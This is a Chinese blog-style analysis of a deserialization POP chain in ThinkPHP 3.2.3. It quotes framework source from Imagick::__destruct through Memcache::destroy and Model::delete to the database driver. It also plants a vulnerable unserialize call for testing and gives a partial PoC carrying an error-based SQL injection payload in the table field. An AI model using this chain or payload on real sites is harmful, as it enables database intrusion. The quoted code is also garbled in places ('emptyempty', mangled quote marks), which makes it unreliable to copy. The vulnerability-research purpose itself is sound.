Thinkphp3.2.3反序列化漏洞实例分析
发布:smiling 来源: PHP粉丝网 添加日期:2023-06-26 11:53:27 浏览: 评论:0
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露,本文给大家带来的是对Thinkphp3.2.3版本框架里面的反序列化漏洞进行分析,浅谈原理以及如何应用。
魔术方法
因为之前已经讲过了,这里就简单提一下,以下面这个魔术方法为例:
_destruct
该方法的作用是,某个对象的所有引用都被删除或者当对象被显式销毁时执行。例如下面代码:
- <?php
- class User{
- public function __destruct()
- {
- echo "xino</br>";
- }
- }
- $test = new User();
- $ser = serialize($test);
- unserialize($ser);
- ?>
执行后会发现调用了魔术方法,我们要想办法来寻找代码之间的关系来构造 反序列化链,常见魔术方法如下:
了解完魔术方法如何触发后便开始我们TP3反序列化漏洞的学习之旅。
复现
这里我是用小皮面板搭建好环境后开始我们的分析,下面是主界面:
需要在控制器IndexController.class.php 处写入:
- public function index(){
- unserialize(base64_decode($_GET[1]));
- }
首先走到Library/Think/Image/Driver/Imagick.class.php,代码如下:
- public function __destruct()
- {
- emptyempty($this->img) || $this->img->destroy();
- }
- }
这里有一个可控的变量img,因为该变量走向了destory(),于是我们寻找一下:
Library/Think/Session/Driver/Memcache.class.php ,该处有个一样的方法:
- public function destroy($sessID)
- {
- return $this->handle->delete($this->sessionName . $sessID);
- }
我们会发现handle和sessionName参数是可控,因为走向了delete函数,于是继续跟进寻找delete,在Mode/Lite/Model.class.php 处:
- public function delete($options = array())
- {
- $pk = $this->getPk();
- if (emptyempty($options) && emptyempty($this->options['where'])) {
- // 如果删除条件为空 则删除当前数据对象所对应的记录
- if (!emptyempty($this->data) && isset($this->data[$pk])) {
- return $this->delete($this->data[$pk]);
- } else {
- return false;
- }
- }
- if (is_numeric($options) || is_string($options)) {
- // 根据主键删除记录
- if (strpos($options, ',')) {
- $where[$pk] = array('IN', $options);
- } else {
- $where[$pk] = $options;
- }
- $options = array();
- $options['where'] = $where;
- }
- // 根据复合主键删除记录
- if (is_array($options) && (count($options) > 0) && is_array($pk)) {
- $count = 0;
- foreach (array_keys($options) as $key) {
- if (is_int($key)) {
- $count++;
- }
- }
- if (count($pk) == $count) {
- $i = 0;
- foreach ($pk as $field) {
- $where[$field] = $options[$i];
- unset($options[$i++]);
- }
- $options['where'] = $where;
- } else {
- return false;
- }
- }
- // 分析表达式
- $options = $this->_parseOptions($options);
- if (emptyempty($options['where'])) {
- // 如果条件为空 不进行删除操作 除非设置 1=1
- return false;
- }
- if (is_array($options['where']) && isset($options['where'][$pk])) {
- $pkValue = $options['where'][$pk];
- }
- if (false === $this->_before_delete($options)) {
- return false;
- }
- $result = $this->db->delete($options); //数据库驱动类中的delete()
- if (false !== $result && is_numeric($result)) {
- $data = array();
- if (isset($pkValue)) {
- $data[$pk] = $pkValue;
- }
- $this->_after_delete($data, $options);
- }
- // 返回删除记录个数
- return $result;
- }
这里比较复杂,需要分析一下,pk,pk,pk,data,$options参数都是可控的,第二次调用该函数后是调用db(Library/Think/Db/Driver.class.php )里面的函数,进去看一下:
- $table = $this->parseTable($options['table']);
- $sql = 'DELETE FROM ' . $table;
- return $this->execute($sql, !emptyempty($options['fetch_sql']) ? true : false);
这里只贴了比较关键的代码,看到table经过parseTable处理之后进了sql语句,跟进了发现没有过滤什么,直接返回了数据,最后调用了execute,我们分析其代码:
- public function execute($str,$fetchSql=false) {
- $this->initConnect(true);
- if ( !$this->_linkID ) return false;
- $this->queryStr = $str;
- if(!emptyempty($this->bind)){
- $that = $this;
- $this->queryStr = strtr($this->queryStr,array_map(function($val) use($that){ return '''.$that->escapeString($val).'''; },$this->bind));
- }
- if($fetchSql){
- return $this->queryStr;
- }
看到第二行是一个初始化连接的代码,我们跟进到最后发现:
- public function connect($config = '', $linkNum = 0, $autoConnection = false)
- {
- if (!isset($this->linkID[$linkNum])) {
- if (emptyempty($config)) {
- $config = $this->config;
- }
- try {
- if (emptyempty($config['dsn'])) {
- $config['dsn'] = $this->parseDsn($config);
- }
- if (version_compare(PHP_VERSION, '5.3.6', '<=')) {
- // 禁用模拟预处理语句
- $this->options[PDO::ATTR_EMULATE_PREPARES] = false;
- }
- $this->linkID[$linkNum] = new PDO($config['dsn'], $config['username'], $config['password'], $this->options);
- } catch (\PDOException $e) {
- if ($autoConnection) {
- trace($e->getMessage(), '', 'ERR');
- return $this->connect($autoConnection, $linkNum);
- } elseif ($config['debug']) {
- E($e->getMessage());
- }
- }
- }
- return $this->linkID[$linkNum];
- }
可以通过里面的相应代码:
$this->config
建立数据库连接,整个的POP链跟进顺序如下:
__destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->
因为构造poc较长,这里只贴关键处,有兴趣的小伙伴可以自行去构造:
- public function __construct(){
- $this->db = new Mysql();
- $this->options['where'] = '';
- $this->pk = 'id';
- $this->data[$this->pk] = array(
- "table" => "name where 1=updatexml(1,user(),1)#",
- "where" => "1=1"
- ); }
生成后传入payload即可实现错报注入,体现在payload里就是table这个语句,经过一串的操作使之与数据库连接来执行sql语句:
结语:给大家带来了tp3的反序列化漏洞分析,主要还是要理清各个链的关系以及如何让它们联系起来,有兴趣的小伙伴可以自己去搭建尝试,喜欢本文的小伙伴希望可以一键三连支持一下。
Tags: Thinkphp3.2.3反序列化漏洞
分享到:
- 上一篇:分析ThinkPHP防止重复提交表单的方法实例
- 下一篇:最后一页
推荐文章
热门文章
最新评论文章
- 写给考虑创业的年轻程序员(10)
- PHP新手上路(一)(7)
- 惹恼程序员的十件事(5)
- PHP邮件发送例子,已测试成功(5)
- 致初学者:PHP比ASP优秀的七个理由(4)
- PHP会被淘汰吗?(4)
- PHP新手上路(四)(4)
- 如何去学习PHP?(2)
- 简单入门级php分页代码(2)
- php中邮箱email 电话等格式的验证(2)